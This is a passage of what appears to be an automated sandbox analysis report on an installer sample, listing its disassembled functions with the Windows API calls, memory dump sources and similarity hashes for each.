                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 00650840
                                                                                    • FindClose.KERNEL32(000000FF,0065086B,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 0065085E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction ID: 7e40c14d5cf5c67ddc04c5ae91bd146497d11b7686551e4e99c720dcad4bb53e
                                                                                    • Opcode Fuzzy Hash: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction Fuzzy Hash: 4F319471A0061C9FEF10EB65CC45ADEB7F9EB88305F5145FAE804B3291EA389E84CE54
                                                                                    Function 10001FA0 Relevance: 10.6, APIs: 7, Instructions: 73processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                    • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                    • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                    • String ID:
                                                                                    • API String ID: 3952204985-0
                                                                                    • Opcode ID: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                    • Instruction ID: d3f3af0a4508f7e27652e937122bdb82b1fceeeb5c55f2899ae714965ea1cc71
                                                                                    • Opcode Fuzzy Hash: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                    • Instruction Fuzzy Hash: C3217175900218BBEB50DBE4CC89FEEB7B8EB49741F108198F614A61D5D770AB48CB60
                                                                                    Function 005B261C Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 005B2661
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005B267E
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B26A3
                                                                                    • GetActiveWindow.USER32 ref: 005B26B1
                                                                                    • MessageBoxW.USER32(00000000,00000000,?,-0000002D), ref: 005B26DE
                                                                                    • SetActiveWindow.USER32(?,005B270C,?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    • Opcode ID: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction ID: 0959946ea7ea2d423f2b07d1ac2efebd9c7287cb6bf5dae26c143587a2194954
                                                                                    • Opcode Fuzzy Hash: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction Fuzzy Hash: 89318B34A04605AFDB00EFA9DD86EDE7BE9FB49350F5045A5F410E73A1DA78AD00DB24
                                                                                    Function 10016A5E Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                    • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                    • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 1045392073-0
                                                                                    • Opcode ID: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                    • Instruction ID: 4823d0db6d89783cfdf2c75b6990e32170b40ac30757b8ad96a9877ce2fabe7b
                                                                                    • Opcode Fuzzy Hash: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                    • Instruction Fuzzy Hash: 9031C779D052289ADB51DFA4DD89BCDBBB8BF08300F1041AAE40DAB250E7719BC48F45
                                                                                    Function 0046523C Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?,?,00644460), ref: 00465253
                                                                                    • LoadResource.KERNEL32(00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?), ref: 0046526D
                                                                                    • SizeofResource.KERNEL32(00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000), ref: 00465287
                                                                                    • LockResource.KERNEL32(00464B24,00000000,00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000), ref: 00465291
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction ID: cc44b1e40f387fa113896bb731206f382d166b60eb9947859bc6d233c5ebbc2f
                                                                                    • Opcode Fuzzy Hash: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction Fuzzy Hash: 32F0D1B36046046F5744EE9DA881D9B77ECEE89368310015FF908C7206EA38DE118779
                                                                                    Function 0040BE44 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BEEE
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BF0A
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BF1B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$Valid
                                                                                    • String ID:
                                                                                    • API String ID: 1826331170-0
                                                                                    • Opcode ID: f0be303c8ae3a3db899ae323bf25bb91345b097c84c1ea8a1fe739e6adf72043
                                                                                    • Instruction ID: 36380bb8d2d00a5cd107783bbe8ece87911f5d12961edb049f33984dfb0094ad
                                                                                    • Opcode Fuzzy Hash: f0be303c8ae3a3db899ae323bf25bb91345b097c84c1ea8a1fe739e6adf72043
                                                                                    • Instruction Fuzzy Hash: 33316D71A04718ABDB20DB65CC81BDBB7B9EB44702F5004BAA608B32D1D7795E80CE9D
                                                                                    Function 0060F338 Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,0060F3CE,?,00000000,00000000,?,0060F3E4,?,00613037), ref: 0060F355
                                                                                    • CoCreateInstance.OLE32(00661B20,00000000,00000001,00661B30,00000000,00000000,0060F3CE,?,00000000,00000000,?,0060F3E4,?,00613037), ref: 0060F37B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 2b7efb7c08ec95d5ac9d012ecff19a46f0113b13660edf46e1a6b002756301d2
                                                                                    • Instruction ID: e6de0220a551c525d3073600045ea431ae85d93fb4f84d3b2f3a07f0fd70666f
                                                                                    • Opcode Fuzzy Hash: 2b7efb7c08ec95d5ac9d012ecff19a46f0113b13660edf46e1a6b002756301d2
                                                                                    • Instruction Fuzzy Hash: 1311C430244204EFDB28DBA5CC85F5AB7EAEB05314F514079F000E7AA1C7B4DD00CB95
                                                                                    Function 005B20A4 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005B20B1
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005B20C1
                                                                                      • Part of subcall function 00411CC8: CreateMutexW.KERNEL32(?,?,?,?,00650B47,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000), ref: 00411CDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                    • String ID:
                                                                                    • API String ID: 3525989157-0
                                                                                    • Opcode ID: 96aa425f4f1ca6fb28b2fca93f9883b69411c115ce52dc2fb35b5bd094e7d832
                                                                                    • Instruction ID: 030b3d5056c1a35ec4f738022bc459d844e504157d5d076cb1adade252ba7484
                                                                                    • Opcode Fuzzy Hash: 96aa425f4f1ca6fb28b2fca93f9883b69411c115ce52dc2fb35b5bd094e7d832
                                                                                    • Instruction Fuzzy Hash: 6DE065B16443016FE700DF758C82F8B72DC9B44724F10492EB664D72D1F678D948879A
                                                                                    Function 00601070 Relevance: 3.0, APIs: 2, Instructions: 20timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(0066978C), ref: 0060107D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,0066978C), ref: 0060109D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2086374402-0
                                                                                    • Opcode ID: 223c73414ae4cf3b518c4eaf210b6019ad5cc185f74778f8790ce031bb03a183
                                                                                    • Instruction ID: a7947e9422a9c24e952e4898eea57e5707ca9917051780ded715f0c801f4df47
                                                                                    • Opcode Fuzzy Hash: 223c73414ae4cf3b518c4eaf210b6019ad5cc185f74778f8790ce031bb03a183
                                                                                    • Instruction Fuzzy Hash: 40E0EC75D1020CABCB10EFE9D8468DFBBBCAB04314F4046A6B924E3351EB35A7518F95
                                                                                    Function 10016721 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                    • Instruction ID: 772fdfb54747e28d4c8254296b593cf3c963f9d1e760632a41fcaf1a051b6687
                                                                                    • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                    • Instruction Fuzzy Hash: ABA128B1A10669CBEB15CF54CCC1BA9BBF4FB48364F19C62AE415AB290D374D984CF90
                                                                                    Function 00CE66F8 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CE670E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                    • Instruction ID: 4a6a6cfdbaa90df9778bc918d5a5eb58dc3a71a28aefceb535e5798b45eb39c9
                                                                                    • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                    • Instruction Fuzzy Hash: 7DA17EB2E10659CBEB19CF55C8C1BA9BBB1FB58364F19C22AE425E7250D334DA50CF90
                                                                                    Function 004270EC Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?,00427178,00000000,00427190,?,?,004271AA,005B1257,00000000), ref: 00427118
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: 235a6e9fecbdc768696314ba284c639279867603b6b7ed9726a9360dca84871d
                                                                                    • Instruction ID: 510de5ddbe74311da3514f823b091c3129d8178e497fae50679d1ee32f47e5c9
                                                                                    • Opcode Fuzzy Hash: 235a6e9fecbdc768696314ba284c639279867603b6b7ed9726a9360dca84871d
                                                                                    • Instruction Fuzzy Hash: 1AF01CB46013068FC340DF29F8416957BE6E744704F40962DF884C33A1E7B998448BA5
                                                                                    Function 005FB6B8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,005FB7B8,?,00000001,00000000), ref: 005FB6CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
